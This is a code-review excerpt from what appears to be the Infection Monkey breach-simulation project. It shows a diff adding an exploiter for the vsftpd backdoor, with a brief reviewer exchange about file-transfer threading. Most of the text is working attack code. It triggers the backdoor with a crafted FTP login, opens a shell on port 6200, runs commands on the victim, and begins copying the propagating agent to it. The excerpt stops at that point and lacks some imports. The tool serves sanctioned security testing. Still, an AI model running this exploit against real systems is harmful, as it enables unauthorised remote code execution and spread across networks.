monkey/infection_monkey/exploit/vsftpd.py

```diff
@@ -0,0 +1,123 @@
+from infection_monkey.network.tools import check_tcp_port
+from infection_monkey.exploit.tools import build_monkey_commandline
+from common.utils.exploit_enum import ExploitType
+
+LOG = getLogger(__name__)
+
+__author__ = 'D3fa1t'
+
+FTP_PORT = 21
+TRANSFER_UPDATE_RATE = 15
+COMMAND = "uname -a"
+
+class VSFTPDExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['linux', None]
+    EXPLOIT_TYPE = ExploitType.OTHER
+
+    def __init__(self, host):
+        self._update_timestamp = 0
+        super(VSFTPDExploiter, self).__init__(host)
+        self.skip_exist = self._config.skip_exploit_if_file_exist
+
+    def exploit_host(self):
+        try:
+            LOG.info('[*] Attempting to trigger backdoor...')
+            ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            ftp_socket.connect((self.host.ip_addr, FTP_PORT))
+
+            # Attempt to login to trigger backdoor
+            ftp_socket.send(b'USER letmein:)\n')
+            ftp_socket.send(b'PASS please\n')
+            time.sleep(2)
+            ftp_socket.close()
+            LOG.info('[+] Triggered backdoor')
+
+        except Exception:
+            LOG.info('[!] Failed to trigger backdoor on %s' , self.host.ip_addr)
+
+        try:
+            LOG.info('[*] Attempting to connect to backdoor...')
+            backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            backdoor_socket.connect((self.host.ip_addr, 6200))
+            LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)
+            command = str.encode("uname -o" + '\n')
+            backdoor_socket.send(command)
+            response = backdoor_socket.recv(1024).decode('utf-8')
+            LOG.info('[+] Response for uname -o: %s', response)
+            if 'linux' in response.lower().strip():
+                #command execution is successful
+                self.host.os['type'] = 'linux'
+            else :
+                LOG.info("Port 6200 opened but failed to execute commands on victim %r ",self.host)
+
+            command = str.encode("uname -m" + '\n')
+            backdoor_socket.send(command)
+            response = backdoor_socket.recv(1024).decode('utf-8')
+            LOG.info('[+] Response for uname -m: %s', response)
+            if '' != response.lower().strip():
+                #command execution is successful
+                self.host.os['machine'] = response.lower().strip()
+            else :
+                LOG.info("Failed to execute command uname -m on victim %r ",self.host)
+
+            src_path = get_target_monkey(self.host)
+
+            if not src_path:
+                LOG.info("Can't find suitable monkey executable for host %r", self.host)
+                return False
+
+            
+            LOG.info('[+] Connected to backdoor on %s:6200', self.host.ip_addr)
+
+            #copy the monkey into the machine
+            http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
```

Comment:
You don't know when http server will be ready to send files, because it runs on a separate thread. Use `create_locked_transfer` instead.

Reply:
Using `create_locked_transfer ` instead of `create_transfer`